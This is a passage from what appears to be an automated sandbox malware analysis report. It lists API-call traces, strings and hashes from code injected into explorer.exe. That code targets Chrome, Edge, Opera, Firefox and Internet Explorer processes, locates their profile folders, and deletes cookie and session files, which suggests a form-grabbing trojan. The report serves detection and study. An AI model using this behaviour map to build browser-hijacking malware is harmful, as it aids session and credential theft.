                                                                                                                                                      • FindFirstFileW.KERNELBASE(00000000,?), ref: 0016151C
                                                                                                                                                      • wsprintfW.USER32 ref: 00161557
                                                                                                                                                      • SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0016156A
                                                                                                                                                      • DeleteFileW.KERNELBASE(00000000), ref: 00161571
                                                                                                                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00161584
                                                                                                                                                      • FindClose.KERNELBASE(00000000), ref: 0016158F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileFind$wsprintf$CloseFirstHeapNext$AllocateAttributesDeleteDirectoryProcessRemove
                                                                                                                                                      • String ID: %s%s$*.*
                                                                                                                                                      • API String ID: 2055899612-705776850
                                                                                                                                                      • Opcode ID: b53d20ad07f861bd8e0066e27a34149781d908b368bd027c02ceeb200ed2e183
                                                                                                                                                      • Instruction ID: 58d5b8d08a077edaebf413e71792665a3ebc52febc2f5794ee610c5972db7cce
                                                                                                                                                      • Opcode Fuzzy Hash: b53d20ad07f861bd8e0066e27a34149781d908b368bd027c02ceeb200ed2e183
                                                                                                                                                      • Instruction Fuzzy Hash: 2211D6312043147BD310AB749C49ABF7BACEFA7355F040519FE5282292DB7499E582A6
                                                                                                                                                      Function 001613FE Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 69fileCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 246 1613fe-161444 call 161000 wsprintfW FindFirstFileW 249 161446 246->249 250 1614c4-1614d5 call 161011 246->250 251 16144a-16144f 249->251 254 161451-16145c call 1613d7 251->254 255 1614a9-1614b7 FindNextFileW 251->255 254->255 259 16145e-161499 call 161000 wsprintfW call 1614d8 254->259 255->251 257 1614b9-1614c0 FindClose 255->257 257->250 264 1614a2-1614a4 call 161011 259->264 265 16149b-16149c RemoveDirectoryW 259->265 264->255 265->264
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00161000: GetProcessHeap.KERNEL32(00000008,00000208,00161418), ref: 00161003
                                                                                                                                                        • Part of subcall function 00161000: RtlAllocateHeap.NTDLL(00000000), ref: 0016100A
                                                                                                                                                      • wsprintfW.USER32 ref: 0016142A
                                                                                                                                                      • FindFirstFileW.KERNELBASE(00000000,?), ref: 00161439
                                                                                                                                                      • wsprintfW.USER32 ref: 00161476
                                                                                                                                                        • Part of subcall function 001614D8: wsprintfW.USER32 ref: 0016150D
                                                                                                                                                        • Part of subcall function 001614D8: FindFirstFileW.KERNELBASE(00000000,?), ref: 0016151C
                                                                                                                                                        • Part of subcall function 001614D8: wsprintfW.USER32 ref: 00161557
                                                                                                                                                        • Part of subcall function 001614D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0016156A
                                                                                                                                                        • Part of subcall function 001614D8: DeleteFileW.KERNELBASE(00000000), ref: 00161571
                                                                                                                                                        • Part of subcall function 001614D8: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00161584
                                                                                                                                                        • Part of subcall function 001614D8: FindClose.KERNELBASE(00000000), ref: 0016158F
                                                                                                                                                      • RemoveDirectoryW.KERNELBASE(00000000), ref: 0016149C
                                                                                                                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 001614AF
                                                                                                                                                      • FindClose.KERNELBASE(00000000), ref: 001614BA
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileFind$wsprintf$CloseFirstHeapNext$AllocateAttributesDeleteDirectoryProcessRemove
                                                                                                                                                      • String ID: %s%s$%s%s\$*.*
                                                                                                                                                      • API String ID: 2055899612-4093207852
                                                                                                                                                      • Opcode ID: 5a168f056a5d0d8930315b973f343e5fb3ee2eea6851683964748f77f0f4f5ed
                                                                                                                                                      • Instruction ID: 0c71ae2de1fb4c96234b4612a64bb1898b00ad321ec4d462530f45529d5c02d0
                                                                                                                                                      • Opcode Fuzzy Hash: 5a168f056a5d0d8930315b973f343e5fb3ee2eea6851683964748f77f0f4f5ed
                                                                                                                                                      • Instruction Fuzzy Hash: 2611E4312043407BD710AB25DC49ABF76ECEFE6341F08052CFA4183292DF7558A98662
                                                                                                                                                      Function 00163D8D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46nativeCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 288 163d8d-163d97 call 161274 291 163e03-163e04 288->291 292 163d99-163dc2 call 161000 RtlMoveMemory 288->292 295 163dc4-163de2 call 161000 RtlMoveMemory 292->295 296 163de8-163dfc 292->296 295->296 300 163dfe-163dff 296->300 301 163e0a-163e15 call 163be1 296->301 300->291 302 163e01-163e05 call 163862 300->302 307 163e17-163e1b call 163d8d 301->307 308 163e20-163e23 301->308 302->301 307->308
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00161274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00161281
                                                                                                                                                        • Part of subcall function 00161000: GetProcessHeap.KERNEL32(00000008,00000208,00161418), ref: 00161003
                                                                                                                                                        • Part of subcall function 00161000: RtlAllocateHeap.NTDLL(00000000), ref: 0016100A
                                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00163DAF
                                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00163DE2
                                                                                                                                                      • NtUnmapViewOfSection.NTDLL(000000FF), ref: 00163DEB
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: HeapMemoryMove$AllocateProcessQuerySectionUnmapViewVirtual
                                                                                                                                                      • String ID: 0-vw
                                                                                                                                                      • API String ID: 4050682147-1459538145
                                                                                                                                                      • Opcode ID: 1a5d17a9c9d0ff7443f3c397e8875b1bd03d727d65115ec36f4a36c021ff6a99
                                                                                                                                                      • Instruction ID: 8baa5e8d6ab4753fdfc8edaa4132757e5f54f4d328d37c25fcc8e7ca52932f33
                                                                                                                                                      • Opcode Fuzzy Hash: 1a5d17a9c9d0ff7443f3c397e8875b1bd03d727d65115ec36f4a36c021ff6a99
                                                                                                                                                      • Instruction Fuzzy Hash: 7701D430404110EFC718ABA4DC58AB7BB58EF51312F148539F425871A1CB779AA1CBB0
                                                                                                                                                      Function 00162EA8 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 19COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 313 162ea8-162ebc StrStrIA 314 162ebe-162eca call 162e1b 313->314 315 162ecd-162ed1 313->315 314->315
                                                                                                                                                      APIs
                                                                                                                                                      • StrStrIA.KERNELBASE(chrome.exe|opera.exe|msedge.exe,?,00000000,?,00163CD2), ref: 00162EB4
                                                                                                                                                        • Part of subcall function 00162E1B: OpenProcess.KERNEL32(00001000,00000000,?,?,00000001,?,00162EC5), ref: 00162E27
                                                                                                                                                        • Part of subcall function 00162E1B: NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,00010006,?), ref: 00162E52
                                                                                                                                                        • Part of subcall function 00162E1B: NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,?,?), ref: 00162E7F
                                                                                                                                                        • Part of subcall function 00162E1B: StrStrIW.SHLWAPI(?,NetworkService), ref: 00162E92
                                                                                                                                                      Strings
                                                                                                                                                      • chrome.exe|opera.exe|msedge.exe, xrefs: 00162EAB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Process$InformationQuery$Open
                                                                                                                                                      • String ID: chrome.exe|opera.exe|msedge.exe
                                                                                                                                                      • API String ID: 4117927671-3743313796
                                                                                                                                                      • Opcode ID: d8d8637bfb13b680642640e25bdb0347e5776ff2c0f6f9e6b24f7368c93fdae7
                                                                                                                                                      • Instruction ID: b4aff7b6b2f8f5e236d8613f9a306bb23cd52f57cf7c3f2de8f8119a6db343c1
                                                                                                                                                      • Opcode Fuzzy Hash: d8d8637bfb13b680642640e25bdb0347e5776ff2c0f6f9e6b24f7368c93fdae7
                                                                                                                                                      • Instruction Fuzzy Hash: 29D0A932300A200B672C267A6C0A86F948DCBC2A62302413EE802C3240EBA1CC9342A0
                                                                                                                                                      Function 00163709 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 73stringsleepCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00161363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00161374
                                                                                                                                                        • Part of subcall function 00161363: Process32First.KERNEL32(00000000,?), ref: 00161393
                                                                                                                                                        • Part of subcall function 00161363: CloseHandle.KERNELBASE(00000000), ref: 001613CB
                                                                                                                                                        • Part of subcall function 00161363: lstrcmpiA.KERNEL32(?), ref: 001613A3
                                                                                                                                                        • Part of subcall function 00161363: Process32Next.KERNEL32(00000000,00000128), ref: 001613C0
                                                                                                                                                      • Sleep.KERNELBASE(000003E8,?,00000000,00000001,?,?,00163839,?,00163C53,00000001), ref: 00163731
                                                                                                                                                        • Part of subcall function 00161000: GetProcessHeap.KERNEL32(00000008,00000208,00161418), ref: 00161003
                                                                                                                                                        • Part of subcall function 00161000: RtlAllocateHeap.NTDLL(00000000), ref: 0016100A
                                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,00000000,00000001,?,?,00163839,?,00163C53,00000001), ref: 00163752
                                                                                                                                                      • lstrcatW.KERNEL32(00000000,\Google\Chrome\User Data\,?,00000000,00000001,?,?,00163839,?,00163C53,00000001), ref: 00163764
                                                                                                                                                        • Part of subcall function 001615BE: PathCombineW.SHLWAPI(00000000,00000000,*.*,771EF770,00000000,76B2B2E0,777783D0), ref: 001615EB
                                                                                                                                                        • Part of subcall function 001615BE: FindFirstFileW.KERNELBASE(00000000,?), ref: 001615F7
                                                                                                                                                        • Part of subcall function 001615BE: lstrcmpiW.KERNEL32(?,001641C8), ref: 00161623
                                                                                                                                                        • Part of subcall function 001615BE: lstrcmpiW.KERNEL32(?,001641CC), ref: 00161633
                                                                                                                                                        • Part of subcall function 001615BE: PathCombineW.SHLWAPI(00000000,?,?), ref: 0016164C
                                                                                                                                                        • Part of subcall function 001615BE: FindNextFileW.KERNELBASE(00000000,00000010), ref: 0016169C
                                                                                                                                                        • Part of subcall function 001615BE: FindClose.KERNELBASE(00000000), ref: 001616AB
                                                                                                                                                      • RtlZeroMemory.NTDLL(00000000,00001000), ref: 0016377A
                                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,00000000,00000001,?,?,00163839,?,00163C53,00000001), ref: 00163783
                                                                                                                                                      • lstrcatW.KERNEL32(00000000,\Microsoft\Edge\User Data\,?,00000000,00000001,?,?,00163839,?,00163C53,00000001), ref: 0016378F
                                                                                                                                                      • RtlZeroMemory.NTDLL(00000000,00001000), ref: 001637A3
                                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000,?,00000000,00000001,?,?,00163839,?,00163C53,00000001), ref: 001637AC
                                                                                                                                                      • lstrcatW.KERNEL32(00000000,\Opera Software\Opera Stable\,?,00000000,00000001,?,?,00163839,?,00163C53,00000001), ref: 001637B8
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Path$FindFolderSpeciallstrcatlstrcmpi$CloseCombineFileFirstHeapMemoryNextProcess32Zero$AllocateCreateHandleProcessSleepSnapshotToolhelp32
                                                                                                                                                      • String ID: Cookies*$\Google\Chrome\User Data\$\Microsoft\Edge\User Data\$\Opera Software\Opera Stable\$chrome.exe$msedge.exe$opera.exe
                                                                                                                                                      • API String ID: 909495591-1175993956
                                                                                                                                                      • Opcode ID: 8c3fe6fd5d7552310033d6cfe6df86d191a6b40eda8b1586d578e2cd5332f0dc
                                                                                                                                                      • Instruction ID: 2fe5c585c4d9ce881a66550c8d877638ac6a8c38d57e17e69201fcef56ad4a3d
                                                                                                                                                      • Opcode Fuzzy Hash: 8c3fe6fd5d7552310033d6cfe6df86d191a6b40eda8b1586d578e2cd5332f0dc
                                                                                                                                                      • Instruction Fuzzy Hash: 1611216038136433E52033669C93FAF654EDFB3B91F050024F206AA6C1CFC09E6145BA
                                                                                                                                                      Function 00163BE1 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130stringsleepprocessCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 134 163be1-163c3a call 161000 * 2 wsprintfA call 161235 141 163c5e 134->141 142 163c3c-163c4c call 161141 134->142 144 163c64-163c74 CreateToolhelp32Snapshot 141->144 148 163c53-163c59 call 161261 142->148 149 163c4e call 163829 142->149 146 163d7d-163d88 Sleep 144->146 147 163c7a-163c8e Process32First 144->147 146->144 150 163d6e-163d70 147->150 148->141 149->148 153 163d76-163d77 CloseHandle 150->153 154 163c93-163ca5 lstrcmpiA 150->154 153->146 155 163ca7-163cb5 lstrcmpiA 154->155 156 163cda-163ce3 call 1612aa 154->156 155->156 158 163cb7-163cc5 lstrcmpiA 155->158 161 163ce5-163cee call 161305 156->161 162 163d62-163d68 Process32Next 156->162 158->156 160 163cc7-163cd4 call 162ea8 158->160 160->156 160->162 161->162 167 163cf0-163cf7 call 161320 161->167 162->150 167->162 170 163cf9-163d06 call 161274 167->170 170->162 173 163d08-163d5d lstrcmpiA call 161090 call 161fe5 call 161090 170->173 173->162
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00161000: GetProcessHeap.KERNEL32(00000008,00000208,00161418), ref: 00161003
                                                                                                                                                        • Part of subcall function 00161000: RtlAllocateHeap.NTDLL(00000000), ref: 0016100A
                                                                                                                                                      • wsprintfA.USER32 ref: 00163C1F
                                                                                                                                                        • Part of subcall function 00161235: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 0016123F
                                                                                                                                                        • Part of subcall function 00161235: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000000,00163C33), ref: 00161251
                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00163C69
                                                                                                                                                      • Process32First.KERNEL32(00000000,?), ref: 00163C88
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 00163CA1
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 00163CB1
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00163CC1
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00163D12
                                                                                                                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 00163D68
                                                                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 00163D77
                                                                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 00163D82
                                                                                                                                                        • Part of subcall function 00161141: lstrlen.KERNEL32(?,?,?,00000000,?,001629DD,00000001), ref: 00161150
                                                                                                                                                        • Part of subcall function 00161141: lstrlen.KERNEL32(:method POST,?,00000000,?,001629DD,00000001), ref: 00161155
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcmpi$FileHeapProcess32lstrlen$AllocateCloseCreateFirstHandleMappingNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
                                                                                                                                                      • String ID: %s%s$fgclearcookies$firefox.exe$iexplore.exe$microsoftedgecp.exe
                                                                                                                                                      • API String ID: 2509890648-2554907557
                                                                                                                                                      • Opcode ID: 7a75256cabe74ecfab72d1b60cc18460b5cf8bed88ccee7997fc02f262dbee60
                                                                                                                                                      • Instruction ID: 4a86f1521b6044efbaacb106ef790f9c29968ffb29f9e63ff6f57e5fca3ea254
                                                                                                                                                      • Opcode Fuzzy Hash: 7a75256cabe74ecfab72d1b60cc18460b5cf8bed88ccee7997fc02f262dbee60
                                                                                                                                                      • Instruction Fuzzy Hash: 8B412531204311ABCB14EBB4DC95A7F73ADAF95B40F040528F962936D1DB70DE66C6A2
                                                                                                                                                      Function 001635D4 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 64stringsleepCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00161363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00161374
                                                                                                                                                        • Part of subcall function 00161363: Process32First.KERNEL32(00000000,?), ref: 00161393
                                                                                                                                                        • Part of subcall function 00161363: CloseHandle.KERNELBASE(00000000), ref: 001613CB
                                                                                                                                                        • Part of subcall function 00161363: lstrcmpiA.KERNEL32(?), ref: 001613A3
                                                                                                                                                        • Part of subcall function 00161363: Process32Next.KERNEL32(00000000,00000128), ref: 001613C0
                                                                                                                                                      • Sleep.KERNELBASE(000003E8,?,00000000,?,0016382F,?,00163C53,00000001), ref: 001635FA
                                                                                                                                                        • Part of subcall function 00161000: GetProcessHeap.KERNEL32(00000008,00000208,00161418), ref: 00161003
                                                                                                                                                        • Part of subcall function 00161000: RtlAllocateHeap.NTDLL(00000000), ref: 0016100A
                                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,00000000,?,0016382F,?,00163C53,00000001), ref: 00163613
                                                                                                                                                      • lstrcatW.KERNEL32(00000000,\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\,?,00000000,?,0016382F,?,00163C53,00000001), ref: 00163623
                                                                                                                                                      • wsprintfW.USER32 ref: 00163644
                                                                                                                                                        • Part of subcall function 001614D8: wsprintfW.USER32 ref: 0016150D
                                                                                                                                                        • Part of subcall function 001614D8: FindFirstFileW.KERNELBASE(00000000,?), ref: 0016151C
                                                                                                                                                        • Part of subcall function 001614D8: wsprintfW.USER32 ref: 00161557
                                                                                                                                                        • Part of subcall function 001614D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0016156A
                                                                                                                                                        • Part of subcall function 001614D8: DeleteFileW.KERNELBASE(00000000), ref: 00161571
                                                                                                                                                        • Part of subcall function 001614D8: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00161584
                                                                                                                                                        • Part of subcall function 001614D8: FindClose.KERNELBASE(00000000), ref: 0016158F
                                                                                                                                                        • Part of subcall function 00161011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,001614CB), ref: 00161020
                                                                                                                                                        • Part of subcall function 00161011: HeapFree.KERNEL32(00000000), ref: 00161027
                                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000021,00000000,?,00000000,?,0016382F,?,00163C53,00000001), ref: 00163672
                                                                                                                                                      • lstrcatW.KERNEL32(00000000,00164614,?,00000000,?,0016382F,?,00163C53,00000001), ref: 00163682
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileHeap$Findwsprintf$CloseFirstFolderNextPathProcessProcess32Speciallstrcat$AllocateAttributesCreateDeleteFreeHandleSleepSnapshotToolhelp32lstrcmpi
                                                                                                                                                      • String ID: %s%s$*.*$\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\$iexplore.exe$microsoftedge.exe$microsoftedgecp.exe
                                                                                                                                                      • API String ID: 2436889709-3669280581
                                                                                                                                                      • Opcode ID: d1391991b28f5d5e35f570824c723ef2878f975eda264c5619e1751f517d1d85
                                                                                                                                                      • Instruction ID: 0159754c813339e4e2bcab63030701be95815dd96d44282a52873f84680c937e
                                                                                                                                                      • Opcode Fuzzy Hash: d1391991b28f5d5e35f570824c723ef2878f975eda264c5619e1751f517d1d85
                                                                                                                                                      • Instruction Fuzzy Hash: 8C11C0303842503BFB1427659D9AF7E259ADBE7F42F490028F707AA2C1CFD459E0927A
                                                                                                                                                      Function 001636A1 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 37sleepstringCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00161363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00161374
                                                                                                                                                        • Part of subcall function 00161363: Process32First.KERNEL32(00000000,?), ref: 00161393
                                                                                                                                                        • Part of subcall function 00161363: CloseHandle.KERNELBASE(00000000), ref: 001613CB
                                                                                                                                                      • Sleep.KERNELBASE(000003E8,?,00000000,?,00163834,?,00163C53,00000001), ref: 001636B3
                                                                                                                                                        • Part of subcall function 00161000: GetProcessHeap.KERNEL32(00000008,00000208,00161418), ref: 00161003
                                                                                                                                                        • Part of subcall function 00161000: RtlAllocateHeap.NTDLL(00000000), ref: 0016100A
                                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000,?,00000000,?,00163834,?,00163C53,00000001), ref: 001636CC
                                                                                                                                                      • lstrcatW.KERNEL32(00000000,\Mozilla\Firefox\Profiles\,?,00000000,?,00163834,?,00163C53,00000001), ref: 001636DC
                                                                                                                                                        • Part of subcall function 001614D8: wsprintfW.USER32 ref: 0016150D
                                                                                                                                                        • Part of subcall function 001614D8: FindFirstFileW.KERNELBASE(00000000,?), ref: 0016151C
                                                                                                                                                        • Part of subcall function 001614D8: wsprintfW.USER32 ref: 00161557
                                                                                                                                                        • Part of subcall function 001614D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0016156A
                                                                                                                                                        • Part of subcall function 001614D8: DeleteFileW.KERNELBASE(00000000), ref: 00161571
                                                                                                                                                        • Part of subcall function 001614D8: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00161584
                                                                                                                                                        • Part of subcall function 001614D8: FindClose.KERNELBASE(00000000), ref: 0016158F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$Find$CloseFirstHeapwsprintf$AllocateAttributesCreateDeleteFolderHandleNextPathProcessProcess32SleepSnapshotSpecialToolhelp32lstrcat
                                                                                                                                                      • String ID: \Mozilla\Firefox\Profiles\$cookies.sqlite$firefox.exe$sessionstore.*
                                                                                                                                                      • API String ID: 2731919298-637609321
                                                                                                                                                      • Opcode ID: e409420252805669da90e9aadc14970441a093cb46c9a05a5e8b9cdd24bf172d
                                                                                                                                                      • Instruction ID: 05897aa3c0ffa23e70aae787350685a08262b0e556066676a5eb46735a3a52a5
                                                                                                                                                      • Opcode Fuzzy Hash: e409420252805669da90e9aadc14970441a093cb46c9a05a5e8b9cdd24bf172d
                                                                                                                                                      • Instruction Fuzzy Hash: 7EF0A021300120339A18336A9D0AD7F195ECBF7B52704012CF206A36D1CF9409A292B9
                                                                                                                                                      Function 00161363 Relevance: 7.5, APIs: 5, Instructions: 39processstringCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 279 161363-16137f CreateToolhelp32Snapshot 280 1613d1-1613d6 279->280 281 161381-161399 Process32First 279->281 282 1613c6-1613c8 281->282 283 1613ca-1613cb CloseHandle 282->283 284 16139b-1613ab lstrcmpiA 282->284 283->280 285 1613ad-1613b3 call 16133f 284->285 286 1613b8-1613c0 Process32Next 284->286 285->286 286->282
                                                                                                                                                      APIs
                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00161374
                                                                                                                                                      • Process32First.KERNEL32(00000000,?), ref: 00161393
                                                                                                                                                      • lstrcmpiA.KERNEL32(?), ref: 001613A3
                                                                                                                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 001613C0
                                                                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 001613CB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcmpi
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 868014591-0
                                                                                                                                                      • Opcode ID: ac9f495cf72dc7cfb2839ec61b8982f19557aec10e464d0a2570b2f574f4a30a
                                                                                                                                                      • Instruction ID: 4f798629ff4a81150c75ac77a2418eace582493b88ef1b295438559f170fe60e
                                                                                                                                                      • Opcode Fuzzy Hash: ac9f495cf72dc7cfb2839ec61b8982f19557aec10e464d0a2570b2f574f4a30a
                                                                                                                                                      • Instruction Fuzzy Hash: 41F0C835501124ABD7205B259C08BEE77BCFB09331F0001A0F95AD2690EBB44DA48A90
                                                                                                                                                      Function 00161235 Relevance: 3.0, APIs: 2, Instructions: 23fileCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 310 161235-161247 OpenFileMappingA 311 16125c-161260 310->311 312 161249-161259 MapViewOfFile 310->312 312->311
                                                                                                                                                      APIs
                                                                                                                                                      • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 0016123F
                                                                                                                                                      • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000000,00163C33), ref: 00161251
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000012.00000002.2523730133.0000000000161000.00000040.80000000.00040000.00000000.sdmp, Offset: 00161000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_18_2_161000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$MappingOpenView
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3439327939-0
                                                                                                                                                      • Opcode ID: 1e165c21ef88c5830e4c27f431c2af09c916d7dcc92e3992bd13f6a155a77f88
                                                                                                                                                      • Instruction ID: da82cd8fb2e7fc0f8f4edb7d2c8708e183f6faa28f9d52bf170ddbec5376f303
                                                                                                                                                      • Opcode Fuzzy Hash: 1e165c21ef88c5830e4c27f431c2af09c916d7dcc92e3992bd13f6a155a77f88
                                                                                                                                                      • Instruction Fuzzy Hash: E2D017327052317BE3301BBB6C0CF836E9DDF86AE1B054129F60AD2150D6A08860C2F0
                                                                                                                                                      Function 001615A9 Relevance: 3.0, APIs: 2, Instructions: 9fileCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 318 1615a9-1615bd SetFileAttributesW DeleteFileW
                                                                                                                                                      APIs
                                                                                                                                                      • SetFileAttributesW.KERNELBASE(00000000,00000020,00000000,0016168B), ref: 001615AF
                                                                                                                                                      • DeleteFileW.KERNELBASE(00000000), ref: 001615B6
                                                                                                                                                      Memory Dump Source
